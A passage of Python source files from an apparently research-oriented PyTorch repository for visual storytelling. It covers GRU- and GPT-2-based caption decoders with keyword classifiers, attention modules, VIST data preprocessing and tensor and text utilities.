self.vocab_size = len(tokenizer)
self.k = keyword_top_k
self.keyword_loss_type = keyword_classification_loss
for feature in self.feature_names:
setattr(self, feature, FeatureEncoder(self.feature_dims[feature], self.dim))
self.encoder = nn.Linear(len(self.feature_names) * self.dim, self.dim)
self.pretrained_embedding = pretrained_embedding
self.wte_dim = 300 if self.pretrained_embedding else self.dim
self.wte = nn.Embedding(self.vocab_size, self.wte_dim)
self.context_dim = self.dim // 4
num_layers = 1
self.rnn = {
'rnn': GRU(num_layers, self.wte_dim + self.dim + self.context_dim, self.dim, dropout=self.dropout_ratio),
'scn': SCNLSTM(self.wte_dim + self.dim + self.context_dim, self.keyword_num, self.dim,
num_layers, batch_first=True, dropout=self.dropout_ratio)
}[decoder_type]
self.context_encoder = PrevEncoder(self.dim, self.context_dim)
self.dropout = nn.Dropout(self.dropout_ratio)
if self.share_in_out:
self.out = self.out_shared
else:
self.out = nn.Linear(self.dim, self.vocab_size)
self.keyword_num = len(tokenizer) if self.use_word_subset else self.keyword_num
self.keyword_classifier = KeywordClassifier(
self.wte,
self.keyword_num, self.dim, self.feature_names,
self.feature_dims,
self.dropout_ratio,
recall_k=self.k,
loss_type=self.keyword_loss_type
)
self.init_weights()
self.use_context = False
def make_batch(self, *args, **kwargs):
return make_feature_lm_batch_with_keywords(*args, **kwargs)
def epoch_update(self, epoch):
if epoch > 10:
self.context = True
def get_keyword_map(self, ids):
# get NV
if not self.use_word_subset:
storage = torch.zeros(ids.shape[0], len(self.tokenizer)).float().to(ids.device)
storage.scatter_(-1, ids.unsqueeze(-1), 1)
else:
# storage = torch.eye(len(self.tokenizer)).float().to(ids.device)
storage = None
return storage
def get_keyword_freq(self, batch, device):
if not self.use_word_subset:
c = batch.keyword_counter
else:
c = batch.word_counter
convert_token = ConvertToken()
c = {convert_token(self.tokenizer, k): v for k, v in c.items()}
ids, freq = zip(*c.items())
ids = torch.LongTensor(list(ids)).to(device)
freq = torch.FloatTensor(list(freq)).to(device)
t = torch.zeros(self.vocab_size).float().to(device)
t.scatter_(0, ids, freq)
t = t / (t.sum(dim=-1) + self.eps) # normalize
t.requires_grad_(False)
return t
def init_weights(self):
init_range = 0.1
for feature in self.feature_names:
getattr(self, feature).linear.weight.data.uniform_(-init_range, init_range)
if not self.share_in_out:
self.out.bias.data.fill_(0)
self.out.weight.data.uniform_(-init_range, init_range)
if self.pretrained_embedding is not None and self.pretrained_embedding:
self.wte.load_state_dict({'weight': self.tokenizer.embedding})
def out_shared(self, x):
return torch.matmul(x, self.wte.weight.t())
def generate_token(self, hypo, features, c, h, keyword, group_mask=None):
s = hypo[:, -1] # get last token
s = self.wte(s).unsqueeze(1) # B1C
s = torch.cat((features, c, s), dim=-1)
o, h = self.rnn(s, h, keyword=keyword)
o = self.dropout(o)
logits = self.out(o) # BV
return logits, h
def run_token(self, features, hypo, h, c, keyword, group_mask):
features = OrderedDict(sorted(features.items())) # canonical ordering
for feature in self.feature_names:
features[feature] = getattr(self, feature)(features[feature], h)
features = self.encoder(torch.cat(list(features.values()), dim=-1))
logits, h = self.generate_token(hypo, features, c, h, keyword, group_mask)
return h, c, logits
def run_video(self, features, c, v, L, sentences=None, sampler=None,
keyword=None, reduce_hypo=True, group_mask=None):
video = features['video']
B = video.shape[0]
empty = torch.full((B, self.vocab_size), float('-inf')).to(video.device)
sent = []
eos_flags = torch.LongTensor([0] * B).bool().to(video.device)
h = self.rnn.init_h(B, device=video.device) if hasattr(self, 'rnn') else None
c = self.rnn.init_c(B, self.context_dim, device=video.device) if hasattr(self, 'rnn') else None
s0 = sentences[:, v, 0] if sentences is not None \
else torch.Tensor([self.tokenizer.cls_id]).long().to(video.device).expand(B)
s = s0
hypo = s0.unsqueeze(-1)
for w in range(L):
if eos_flags.all():
logits = empty.clone()
else:
h, c, logits = self.run_token(features, hypo, h, c, keyword=keyword)
if sentences is not None: # training
s = sentences[:, v, min(L - 1, w + 1)].clone()
eos_flags = eos_flags | (sentences[:, v, min(L - 1, w + 1)] == self.tokenizer.sep_id)
else:
s, probs = sampler(logits, self.normalizer_alpha)
eos_flags = eos_flags | (logits.argmax(dim=-1) == self.tokenizer.pad_id)
hypo = torch.cat((hypo, s.unsqueeze(-1)), dim=1)
sent.append(logits)
hypo = hypo[:, 1:]
if sentences is None and reduce_hypo:
hypo = hypo[probs.argmax(dim=-1)]
else:
sent = torch.stack(sent, 1).contiguous()
c = self.context_encoder(h)
if not self.use_context:
c = torch.full_like(c.detach(), 0)
c.requires_grad_(False)
return c, sent, hypo, None, {}
def get_keyword(self, batch, features):
keyword = None
if hasattr(batch, 'keyword_masks'):
keyword = batch.word_subsets if self.use_word_subset else batch.keyword_masks
return self.keyword_classifier(keyword, features)
def process_keyword(self, batch, features):
if (not hasattr(self, 'keyword_map')) and hasattr(batch, 'keyword_map') and batch.keyword_map is not None:
self.keyword_map = self.get_keyword_map(batch.keyword_map)
if (not hasattr(self, 'keyword_freq')) and hasattr(batch, 'word_counter') and batch.keyword_counter is not None:
self.keyword_freq = self.get_keyword_freq(batch, batch.video.device)
keywords, reg_loss, stats = self.get_keyword(batch, features)
keywords = keywords.detach()
if self.use_gt_keywords:
if not self.use_word_subset:
if hasattr(batch, 'keyword_masks'):
keywords = batch.keyword_masks.float()
else:
if hasattr(batch, 'word_subsets'):
keywords = batch.word_subsets.float()
return keywords, stats, reg_loss
def forward(self, batch, **kwargs):
# BVLC, BVL
sent_gt = batch.sentences if hasattr(batch, 'sentences') else None
features = {k: val for k, val \
in {f: getattr(batch, f) for f \
in self.feature_names}.items()}
keywords, stats, reg_loss = self.process_keyword(batch, features)
if hasattr(batch, 'sentences'):
stats = {**stats, 'sentence_len': (batch.sentences != self.tokenizer.pad_id).float().sum(dim=-1).mean().item()}
res = []
vid_stats = []
losses = []
B, V = batch.video.shape[:2]
L = batch.sentences.shape[2] if hasattr(batch, 'sentences') else self.max_target_len
for v in range(V):
feature = {k: val[:, v] for k, val in features.items()}
c = self.rnn.init_c(B, self.context_dim, device=batch.video.device) if hasattr(self, 'rnn') else None
keyword = keywords[:, v] if keywords is not None else None
c, sent, _, small_loss, vid_stat = self.run_video(feature, c, v, L,
sentences=sent_gt, keyword=keyword,
group_mask=batch.group_mask[:, v],
sampler=kwargs.get('sampler', None))
losses.append(small_loss)
vid_stats.append(vid_stat)
res.append(sent) # BLV
vid_stats = {k: mean(v) for k, v in jsonl_to_json(vid_stats).items()}
stats = {**stats, **vid_stats}
del batch.sentences # for generation
small_loss = None if losses[0] is None else mean(losses)
if reg_loss is None:
reg_loss = small_loss
elif small_loss is not None:
reg_loss = reg_loss + small_loss
return torch.stack(res, 1).contiguous(), batch.targets, reg_loss, stats, batch
class FeatureEncoder(nn.Module):
def __init__(self, video_dim, dim):
super(FeatureEncoder, self).__init__()
self.linear = nn.Linear(video_dim, dim)
self.attention = Attention(dim)
def forward(self, feature, h):
# BLC
if isinstance(h, tuple): # check LSTM/GRU
h = h[0]
feature = self.linear(feature)
h = h.mean(dim=1)
return self.attention(h, feature).unsqueeze(1)
class PrevEncoder(nn.Module):
def __init__(self, in_dim, out_dim):
super(PrevEncoder, self).__init__()
self.linear = nn.Linear(in_dim, out_dim)
def forward(self, h):
# BLC
if isinstance(h, tuple): # check LSTM/GRU
h = h[0]
return self.linear(h)
```
#### File: code/model/modules.py
```python
import math
import torch
from torch import nn
import torch.nn.functional as F
from einops import rearrange
class IdentityModule(nn.Module):
def __init__(self):
super(IdentityModule, self).__init__()
def forward(self, x, *args, **kwargs):
return x
class BinaryLayer(torch.autograd.Function):
def forward(self, net_input):
return (net_input > 0).float().to(net_input.device)
def backward(self, grad_output):
return grad_output.clamp(0, 1)
class CutInfLayer(torch.autograd.Function):
def forward(self, net_input):
return net_input
def backward(self, grad_output):
grad_output[grad_output == float('inf')] = 0
return grad_output
def saturating_sigmoid(x):
return (1.2 * torch.sigmoid(x) - 0.1).clamp(0, 1)
def l_n_norm(x, dim=0, n=1, normalize=True):
if n > 0:
f = CutInfLayer()
x = f(x)
x = (x ** n).sum(dim=dim)
if normalize:
x = x ** (1 / n)
return x
elif n == 0:
f = BinaryLayer()
x = f(x)
return x.sum(dim=dim)
class LSTMDecoder(nn.Module):
def __init__(self, embedding):
super(LSTMDecoder, self).__init__()
self.num_layers = 2
self.wte = embedding
self.dim = embedding.weight.shape[1]
self.decoder = nn.GRU(self.dim, self.dim, self.num_layers,
bidirectional=False,
batch_first=True)
def out(self, x):
return torch.matmul(x, self.wte.weight.t())
def forward(self, h, targets, embedded=False):
# BC -> NBC
h = h.unsqueeze(0).expand(self.num_layers, -1, -1).contiguous()
# BL -> BLC
if not embedded:
targets = self.wte(targets)
logits, _ = self.decode(targets, h)
return logits
def decode(self, s, h):
o, h = self.decoder(s, h)
o = self.out(o)
return o, h
class GRU(nn.Module):
'''
batch_first GRU
'''
def __init__(self, num_layers, in_dim, out_dim, dropout=0.1, bidirectional=False):
super(GRU, self).__init__()
self.num_layers = num_layers
self.in_dim = in_dim
self.out_dim = out_dim
self.decoder = nn.GRU(self.in_dim, self.out_dim, self.num_layers,
dropout=dropout,
bidirectional=bidirectional,
batch_first=True)
def init_c(self, B, C, device=0):
return torch.zeros(B, self.num_layers, C).float().to(device)
def init_h(self, B, device=0):
if isinstance(self.decoder, nn.LSTM):
h = (torch.zeros(B, self.num_layers, self.out_dim).float().to(device),
torch.zeros(B, self.num_layers, self.out_dim).float().to(device))
else:
h = torch.zeros(B, self.num_layers, self.out_dim).float().to(device)
return h
@staticmethod
def transpose(h):
if isinstance(h, tuple):
h = [i.transpose(0, 1) for i in h]
else:
h = h.transpose(0, 1)
return h
def forward(self, s, h, **kwargs):
h = self.transpose(h)
o, h = self.decoder(s, h)
h = self.transpose(h) # BLC, BNC
return o, h
class Attention(nn.Module):
"""
Applies an attention mechanism on the output features from the decoder.
"""
def __init__(self, dim):
super(Attention, self).__init__()
self.dim = dim
self.linear1 = nn.Linear(dim * 2, dim)
self.linear2 = nn.Linear(dim, 1, bias=False)
def forward(self, hidden_state, encoder_outputs):
"""
Arguments:
hidden_state {Variable} -- batch_size x dim
encoder_outputs {Variable} -- batch_size x seq_len x dim
Returns:
Variable -- context vector of size batch_size x dim
"""
batch_size, seq_len, _ = encoder_outputs.size()
hidden_state = hidden_state.unsqueeze(1).repeat(1, seq_len, 1)
inputs = torch.cat((encoder_outputs, hidden_state),
2).view(-1, self.dim * 2)
o = self.linear2(torch.tanh(self.linear1(inputs)))
e = o.view(batch_size, seq_len)
alpha = F.softmax(e, dim=1)
context = torch.bmm(alpha.unsqueeze(1), encoder_outputs).squeeze(1)
return context
class ResBlock(nn.Module):
def __init__(self, dim, dropout=0):
super(ResBlock, self).__init__()
self.dim = dim
self.dropout = nn.Dropout(dropout)
self.linear1 = nn.Linear(self.dim, self.dim)
self.linear2 = nn.Linear(self.dim, self.dim)
self.layer_norm1 = nn.LayerNorm(self.dim)
self.layer_norm2 = nn.LayerNorm(self.dim)
self.reset_parameters()
def reset_parameters(self):
initScale = 0.1
self.linear1.weight.data.uniform_(-initScale, initScale)
self.linear1.bias.data.zero_()
self.linear2.weight.data.uniform_(-initScale, initScale)
self.linear2.bias.data.zero_()
def forward(self, x):
x_prev = x
x = self.layer_norm1(x)
x = torch.tanh(x)
x = self.linear1(x)
x = self.layer_norm2(x)
x = F.relu(x)
x = torch.tanh(x)
x = self.dropout(x)
x = self.linear2(x)
return x_prev + x
class MLP(nn.Module):
def __init__(self, in_dim, out_dim=None):
super(MLP, self).__init__()
if out_dim is None:
out_dim = in_dim
self.dim = out_dim
self.l1 = nn.Linear(in_dim, self.dim)
self.l2 = nn.Linear(self.dim, self.dim)
def forward(self, x):
x = self.l1(x)
x = F.relu(x)
x = self.l2(x)
return x
class MultiHeadAttention(nn.Module):
def __init__(self, q_dim, k_dim=None, v_dim=None, m_dim=None, heads=1):
super().__init__()
if k_dim is None:
k_dim = q_dim
if v_dim is None:
v_dim = k_dim
if m_dim is None:
m_dim = q_dim
heads = 1 if q_dim < heads else heads
heads = 1 if k_dim < heads else heads
heads = 1 if v_dim < heads else heads
assert q_dim % heads == 0, f"q_dim: {q_dim} / n_heads: {heads} must be divisible"
assert k_dim % heads == 0, f"k_dim: {k_dim} / n_heads: {heads} must be divisible"
assert v_dim % heads == 0, f"v_dim: {v_dim} / n_heads: {heads} must be divisible"
assert m_dim % heads == 0, f"m_dim: {m_dim} / n_heads: {heads} must be divisible"
self.q = nn.Linear(q_dim // heads, m_dim // heads)
self.k = nn.Linear(k_dim // heads, m_dim // heads)
self.v = nn.Linear(v_dim // heads, m_dim // heads)
self.heads = heads
def forward(self, q, k=None, v=None, bidirectional=False):
if k is None:
k = q.clone()
if v is None:
v = k.clone()
# BLC
q = rearrange(q, 'b q (h c) -> b h q c', h=self.heads)
k = rearrange(k, 'b k (h c) -> b h k c', h=self.heads)
v = rearrange(v, 'b k (h c) -> b h k c', h=self.heads)
q = self.q(q)
k = self.k(k)
v = self.v(v)
a = torch.einsum('bhqc,bhkc->bhqk', q, k)
a = a / math.sqrt(k.shape[-1])
a_q = F.softmax(a, dim=-1) # bhqk
q_new = torch.einsum('bhqk,bhkc->bhqc', a_q, v)
q_new = rearrange(q_new, 'b h q c -> b q (h c)')
if bidirectional:
a_v = F.softmax(a, dim=-2) # bhqk
v = torch.einsum('bhqk,bhqc->bhkc', a_v, q)
v = rearrange(v, 'b h k c -> b k (h c)')
return q_new, v
else:
return q_new
class SelfAttention(MultiHeadAttention):
def __init__(self, q_dim, m_dim=None, heads=1):
super().__init__(q_dim, k_dim=q_dim, v_dim=q_dim, m_dim=m_dim, heads=heads)
def forward(self, q, bidirectional=False):
return super().forward(q, q, q, bidirectional=bidirectional)
class Pffn(nn.Module):
def __init__(self, dim, large_dim):
super().__init__()
self.in_linear = nn.Linear(dim, large_dim)
self.out_linear = nn.Linear(large_dim, dim)
def forward(self, x):
x = self.in_linear(x)
x = F.relu(x)
x = self.out_linear(x)
return x
class Residual(nn.Module):
def __init__(self, module):
super().__init__()
self.m = module
def forward(self, x):
return x + self.m(x)
class TransformerAttention(nn.Module):
def __init__(self, q_dim, m_dim=None, heads=8):
super().__init__()
self.att = SelfAttention(q_dim, m_dim=m_dim, heads=heads)
self.layer_norm = nn.LayerNorm(q_dim)
def forward(self, q):
q_new = self.att(q, bidirectional=False)
return self.layer_norm(q + q_new)
```
#### File: code/model/transformer_dis.py
```python
from collections import OrderedDict
from itertools import chain
import torch
from torch import nn
import torch.nn.functional as F
from exp import ex
from run_transformer import transformer_embed, transformer_run_cells
from .hybrid_dis import HybridDis
from .keyword_classifier import KeywordClassifier
from .NetVLAD import NetVLADWrapper
class TransformerDis(HybridDis):
transformer_name = 'gpt2' # assign transformer_name = 'bert' to use BPE
@classmethod
def get_args(cls):
return {
**super().get_args(),
'dropout_before': False,
}
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before):
super(TransformerDis, self).__init__(transformer, tokenizer)
self.dropout_before = dropout_before
self.net = transformer
self.net.train()
config = self.net.transformer.config
for name in ['emb_dim', 'n_embd', 'd_model', 'hidden_size']:
if hasattr(config, name):
self.gpt_dim = getattr(config, name)
break
assert hasattr(self, 'gpt_dim'), "no dimension specified"
if not hasattr(self.net.transformer, 'word_embedding'):
if not hasattr(self.net.transformer, 'wte'):
if not hasattr(self.net.transformer, 'word_emb'):
if not hasattr(self.net.transformer, 'w'):
self.net.transformer.w = self.net.transformer.embeddings
self.net.transformer.word_emb = self.net.transformer.w
self.net.transformer.wte = self.net.transformer.word_emb
self.net.transformer.word_embedding = self.net.transformer.wte
'''
self.net.transformer.wte = self.net.transformer.word_embedding
if hasattr(self.net.transformer, 'word_embedding'):
del self.net.transformer.word_embedding
'''
'''
self.keyword_classifier = KeywordClassifier(
self.net.transformer.word_embedding,
self.keyword_num, self.dim, self.feature_names,
self.feature_dims,
self.dropout_ratio,
recall_k=self.k,
loss_type=self.keyword_loss_type
)
'''
def chain(input_, f_list):
for op in f_list:
input_ = op(input_)
return input_
for feature in self.feature_names:
if feature in ['human_i3d']:
setattr(self, feature,
nn.Sequential(*[NetVLADWrapper(feature_size=1536, cluster_size=24),
FeatureEncoder(1536 * 24, self.gpt_dim)]))
continue
setattr(self, feature, FeatureEncoder(self.feature_dims[feature], self.gpt_dim))
self.reduce_cat = nn.Linear(self.gpt_dim + self.keyword_num, self.gpt_dim)
self.reduce_c = nn.Linear(self.gpt_dim, self.dim)
self.dropout = nn.Dropout(self.dropout_ratio)
self.visual_dropout = nn.Dropout(self.visual_dropout_ratio)
def add_keyword(self, h, keyword):
h = torch.cat((h, # features.unsqueeze(1).expand(-1, h.shape[1], -1),
keyword.unsqueeze(1).expand(-1, h.shape[1], -1)), dim=-1)
h = self.reduce_cat(h)
return h
def get_logits(self, o, keyword, gt=None):
return self.net.lm_head(o), None, {}
def merge_context(self, features, cls_embd, sep_embd):
features = OrderedDict(sorted(features.items())) # canonical ordering
return torch.cat((cls_embd, *chain(*[(feature, sep_embd) for feature in features.values()])), dim=1)
def get_embedding(self, name, device):
x = torch.LongTensor([getattr(self.tokenizer, name)]).to(device)
x = x.unsqueeze(0)
x = self.net.transformer.word_embedding(x)
return x.squeeze(0)
def run_transformer(self, B, hypo, features, keyword, infer=False):
h, inputs = transformer_embed(self.net.transformer, hypo,
skip_ids=[self.tokenizer.pad_id, self.tokenizer.sep_id],
infer=infer)
h = self.add_keyword(h, keyword)
cls_embd = self.get_embedding('cls_id', h.device)
sep_embd = self.get_embedding('sep_id', h.device)
B, L, C = h.shape
cls_embd = cls_embd.view(1, 1, -1).contiguous().expand(B, 1, -1)
sep_embd = sep_embd.view(1, 1, -1).contiguous().expand(B, 1, -1)
context = self.merge_context(features, cls_embd, sep_embd)
o, context_embedded = transformer_run_cells(self.net.transformer, context, h, hypo=hypo,
pad_id=self.tokenizer.pad_id, **inputs)
o = self.dropout(o)
context_embedded = self.visual_dropout(context_embedded)
return o, context_embedded
def run_transformer_get_loss(self, hypo, features, keyword, group_mask=None, gt=None):
features = OrderedDict(sorted(features.items())) # canonical ordering
res = OrderedDict()
for feature in self.feature_names:
res[feature] = getattr(self, feature)(features[feature])
o, _ = self.run_transformer(hypo, res, keyword)
c = o.mean(dim=1)
c = self.reduce_c(c)
logits, loss, stats = self.get_logits(o, keyword, gt)
return logits, c, loss, stats
def run_token(self, features, hypo, h, c, group_mask, keyword):
logits, h = self.generate_token(hypo, features, c, h, group_mask, keyword)
return h, c, logits
def run_train(self, hypo, features, keyword, group_mask=None):
return self.run_transformer_get_loss(hypo, features, keyword, group_mask, gt=hypo)
def generate_token(self, hypo, features, c, h, group_mask, keyword):
logits, h, _, _ = self.run_transformer_get_loss(hypo, features, keyword, group_mask)
return logits, h
def run_video(self, features, c, v, L, sentences=None, sampler=None,
keyword=None, reduce_hypo=True, group_mask=None):
video = features['video']
B = video.shape[0]
empty = torch.full((B, self.vocab_size), float('-inf')).to(video.device)
sent = []
eos_flags = torch.LongTensor([0] * B).bool().to(video.device)
if c is None:
c = self.rnn.init_c(B, self.context_dim, device=video.device) if hasattr(self, 'rnn') else None
s0 = sentences[:, v, 0] if sentences is not None \
else torch.Tensor([self.tokenizer.cls_id]).long().to(video.device).expand(B)
s = s0
hypo = s0.unsqueeze(-1)
stats = {}
small_loss = None
if sentences is not None: # training
sent, h, small_loss, stats = self.run_train(sentences[:, v], features, keyword, group_mask)
else:
for w in range(L):
if eos_flags.all():
logits = empty.clone()
else:
h = None
h, c, logits = self.run_token(features, hypo, h, c, group_mask, keyword=keyword)
s, probs = sampler(logits, alpha=self.normalizer_alpha)
eos_flags = eos_flags | (logits[:, -1].argmax(dim=-1) == self.tokenizer.pad_id)
hypo = torch.cat((hypo, s.unsqueeze(-1)), dim=1)
sent.append(logits)
hypo = hypo[:, 1:]
if reduce_hypo:
hypo = hypo[probs.argmax(dim=-1)]
c = self.context_encoder(h)
if not self.use_context:
c = torch.full_like(c.detach(), 0)
c.requires_grad_(False)
return c, sent, hypo, small_loss, stats
class FeatureEncoder(nn.Module):
def __init__(self, video_dim, dim):
super(FeatureEncoder, self).__init__()
self.linear = nn.Linear(video_dim, dim)
def forward(self, feature, h=None):
# BLC
feature = self.linear(feature)
feature = F.leaky_relu(feature)
return feature
```
#### File: code/scripts/make_story.py
```python
import json
from pathlib import Path
from collections import defaultdict, OrderedDict
#from exp import ex
def leave_unique(dt):
for k, v in dt.items():
dt[k] = list(set(v))
return dt
def save_file(obj, path, name):
obj_path = path.parent / f"post_{path.stem}_{name}{path.suffix}"
print(f"saving to {obj_path}")
with open(obj_path, 'w') as f:
json.dump(obj, f, indent=4)
<EMAIL>()
def main(filename):
root = Path('~/projects/lsmdc/data/VIST/sis').expanduser()
path = root / filename
with open(path, 'r') as f:
data = json.load(f)
data = data['annotations']
stories = defaultdict(list)
for d in data:
d = d[0]
stories[d['story_id']].append(
{'album_id': d['album_id'],
'photo_flickr_id': d['photo_flickr_id'],
'worker_arranged_photo_order': d['worker_arranged_photo_order'],
'text': d['text']})
albums = defaultdict(list)
images = defaultdict(list)
for k, v in stories.items():
v = OrderedDict([(i['worker_arranged_photo_order'], i) for i in v])
v = sorted(v.items())
v = [i for k, i in v]
texts = ' '.join([i['text'] for i in v])
stories[k] = [texts]
aid = v[0]['album_id']
albums[aid].append(texts)
iid = f"{aid}_{[i['photo_flickr_id'] for i in v]}"
images[iid].append(texts)
stories = leave_unique(stories)
albums = leave_unique(albums)
images = leave_unique(images)
save_file(stories, path, 'stories')
save_file(albums, path, 'albums')
save_file(images, path, 'images')
if __name__ == "__main__":
main('test.story-in-sequence.json')
```
#### File: tapm/code/tensor_utils.py
```python
import torch
'''
def onehot(x, max_size):
hot = torch.FloatTensor(*x.shape, max_size).to(x.device)
x = x.unsqueeze(-1)
hot.zero_()
hot.scatter_(-1, x, 1)
return hot.detach()
'''
def find_first(t, value=0):
# t: 1d tensor
mask = t == value
mask = mask.nonzero()
val = mask.sort()[0]
if val.nelement() > 0:
return val[0].item()
else:
return t.shape[0]
def unsqueeze_expand(src, tgt):
if len(src.shape) != len(tgt.shape):
src = src.view(*src.shape, *[1 for i in range(
len(tgt.shape) - len(src.shape))])
if src.shape != tgt.shape:
src = src.expand_as(tgt)
return src
def move_device(batch, to=-1):
for key, tensor in batch.items():
if torch.is_tensor(tensor):
batch[key] = tensor.to(to)
elif tensor is None:
batch[key] = None
elif isinstance(tensor, dict):
batch[key] = tensor
elif isinstance(tensor, list):
li = []
for t in tensor:
if torch.is_tensor(t):
li.append(t.to(to))
else:
li.append(t)
batch[key] = li
return batch
def remove_cls_sep(x, tokenizer):
targets = x[:, 1:] # remove cls
dec_input = x.clone().detach()
dec_input.masked_scatter_(x == tokenizer.sep_id,
torch.full_like(dec_input, tokenizer.pad_id))
dec_input = dec_input[:, :-1] # remove sep
return dec_input, targets
def onehot(x, total=1000):
storage = torch.zeros(*x.shape, total).bool().to(x.device)
storage.scatter_(dim=-1, index=x.unsqueeze(-1), value=1)
return storage
```
#### File: tapm/code/utils.py
```python
from contextlib import contextmanager
import sys, os
import random
from collections import defaultdict
from datetime import datetime
from copy import copy as pycopy
import six
# import stanfordnlp
import numpy as np
import torch
from torch.nn.utils import clip_grad_norm_
def remove_nonascii(text):
# return ''.join([i if ord(i) < 128 else ' ' for i in text])
return text.encode('ascii', 'ignore').decode('ascii')
def flatten_dict(x):
if isinstance(x, dict):
li = [flatten_dict(v) for v in x.values()]
return flatten_list(li)
elif isinstance(x, list):
return x
else:
return [x]
def flatten_list(x):
return [it for subli in x for it in subli]
def recurse(shape, *args, vid='0', func=None):
if len(shape) > 0:
for i in range(shape[0]):
if not isinstance(vid, str):
if len(vid) > i:
vid_new = vid[i]
recurse(shape[1:], *list([v[i] if v is not None else v for v in args]),
vid=vid_new, func=func)
else:
vid_new = f'{vid}_{i}'
recurse(shape[1:], *list([v[i] if v is not None else v for v in args]),
vid=vid_new, func=func)
else:
func(*args, vid=vid)
def jsonl_to_json(x):
def get_key(t):
if isinstance(t, dict):
return t.keys()
else:
return get_key(t[0])
keys = get_key(x)
def merge_key(t, key):
if isinstance(t[0], dict):
return [i[key] for i in t if key in i]
else:
return [[k for k in merge_key(i, key)] for i in t]
res = {}
for key in keys:
res[key] = merge_key(x, key)
return res
def mean(x):
x = list(x)
x = [i for i in x if i is not None]
if len(x) == 0:
return None
return sum(x) / len(x)
def cut_sample(data, n=800):
if isinstance(data, list):
return data[:n]
elif isinstance(data, dict):
return {k: v for i, (k, v) in enumerate(data.items())
if i < n}
else:
assert False, f'cutting not implemented for type {data.type}'
def get_now():
now = datetime.now()
return now.strftime('%Y-%m-%d-%H-%M-%S')
def add_attr(dt, name, val):
for key, value in dt.items():
setattr(value, name, val)
dt[key] = value
return dt
def transpose_dict(dt):
d = defaultdict(dict)
for key1, inner in dt.items():
for key2, value in inner.items():
d[key2][key1] = value
return d
def peek_dict(dt):
return next(iter(dt.items()))
def freeze(module):
for param in module.parameters():
param.requires_grad = False
def check_equal(li):
if isinstance(li[0], list):
li = [list(i) for i in zip(*li)]
return min([int(len(set(l)) <= 1) for l in li]) > 0
else:
return len(set(li)) <= 1
def clip_grad(model, max_norm=1):
if max_norm is not None:
for p in model.parameters():
clip_grad_norm_(p, max_norm)
def wait_for_key(key="y"):
text = ""
while (text != key):
text = six.moves.input(f"Press {key} to quit")
if text == key:
print("terminating process")
else:
print(f"key {key} unrecognizable")
def remove_duplicate(li, key=lambda x: x):
keys = set([key(i) for i in li])
keys = {k: False for k in keys}
res = []
for i in li:
i_key = key(i)
if not keys[i_key]:
keys[i_key] = True
res.append(i)
return res
def remove_sep(string, sep='[SEP]'):
return string[:string.find(sep)].strip()
def copy(x):
if isinstance(x, list):
res = []
for i in range(len(x)):
res.append(copy(x[i]))
elif isinstance(x, dict):
res = {}
for k in x.keys():
res[k] = copy(x[k])
else:
res = x
return res
def recursive_insert_dict(dt, key_list, val):
key = key_list[0]
if len(key_list) == 1:
dt[key] = val
return dt
if key not in dt:
dt[key] = {}
udt_dt = recursive_insert_dict(dt[key], key_list[1:], val)
dt[key] = udt_dt
return dt
def concatenate_group(text, groups):
res = {}
for group_key, vids in groups.items():
t = [text[vid] for vid in vids]
hypo, tgt = zip(*t)
hypo = ' '.join(list(hypo))
tgt = ' '.join(list(tgt))
res[group_key] = (hypo, tgt)
return res
def break_tie(li, longest=False):
if longest:
res = ''
for l in li:
if len(l) >= len(res):
res = l
else:
len_res = 9999
for l in li:
if len(l) < len_res:
res = l
len_res = len(res)
return res
def refactor_text(text, albums=None, images=None,
return_list=False, longest=False):
if albums is None:
return text
else:
reverse_albums = {vi: k for k, v in albums.items() for vi in v}
text = [{'album_id': reverse_albums[k],
'photo_sequence': images[k],
'story_text_normalized': v.lower()} for k, v in text.items()]
text = [(f"{v['album_id']}_{v['photo_sequence']}", v) for v in text] # remove duplicate
keys = [i[0] for i in text]
keys = list(set(keys))
res = []
for key in keys:
t = [v for k, v in text if k == key]
if not return_list:
t = break_tie(t, longest=longest)
else:
t = {**t[0],
'story_text_normalized': [i['story_text_normalized'] for i in t]}
res.append(t)
return {
'team_name': "temp_team_name",
"evaluation_info": {
"additional_description": "none"
},
"output_stories": res}
def merge_vist_output(hypo, tgt, album=False):
hypo = hypo['output_stories']
tgt = tgt['output_stories']
if album:
res = defaultdict(list)
for v in hypo:
res[v['album_id']].append(v['story_text_normalized'])
hypo = {}
# tie breaking
for k, v in res.items():
hypo[k] = break_tie(v)
else:
hypo = {f"{v['album_id']}_{v['photo_sequence']}": v['story_text_normalized'] for v in hypo}
res = defaultdict(list)
for v in tgt:
if album:
res[v['album_id']].append(v['story_text_normalized'])
else:
res[f"{v['album_id']}_{v['photo_sequence']}"].append(v['story_text_normalized'])
tgt = {k: flatten(v) for k, v in res.items()}
'''
if normalize:
normalizer = VistTokenizer()
hypo = {k: normalizer(v) for k, v in hypo.items()}
tgt = {k: [normalizer(i) for i in v] for k, v in tgt.items()}
'''
return {k: (hypo[k], tgt[k]) for k in tgt.keys()}
'''
def normalize_text(t):
t = t.replace('.', ' .')
t = t.replace(',', ' ,')
t = t.replace('?', ' ?')
t = t.replace('!', ' !')
t = t.replace("'s", " 's")
t = t.replace("n't", " n't")
return t
'''
'''
class VistTokenizer:
def __init__(self):
self.nlp = stanfordnlp.Pipeline(processors='tokenize', lang='en')
def _tokenize(self, x):
doc = self.nlp(x)
res = []
for sent in doc.sentences:
res += [token.words[0].text for token in sent.tokens]
res = ' '.join(res)
return res
def tokenize(self, x):
with suppress_stdout():
return self._tokenize(x)
def __call__(self, x):
return self.tokenize(x)
'''
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def flatten(li):
return [item for sublist in li for item in sublist]
@contextmanager
def suppress_stdout(do=True):
if do:
with open(os.devnull, "w") as devnull:
old_stdout = sys.stdout
sys.stdout = devnull
try:
yield
finally:
sys.stdout = old_stdout
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
```
#### File: tapm/code/vis_tsne.py
```python
from collections import defaultdict
from pathlib import Path
import pickle
from tqdm import tqdm
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
from sklearn.metrics import silhouette_score
import torch
from einops import rearrange
# from tsnecuda import TSNE
from exp import ex
from tensor_utils import move_device
from run_transformer import transformer_embed
@ex.capture
def _tsne(model, loss_fn, optimizer, tokenizer, dataloaders, logger,
metrics, batch_sizes, device, reg_coeff, eval_metric, model_name,
root,
epoch=-1, subset=None, key=None, eval_generate=True,
eval_set=False, sample=False, concat_group=False,
use_vist=False):
if key is None:
key = 'val'
epoch_stats = defaultdict(float)
model.eval()
dataloader = dataloaders[key]
if subset is not None:
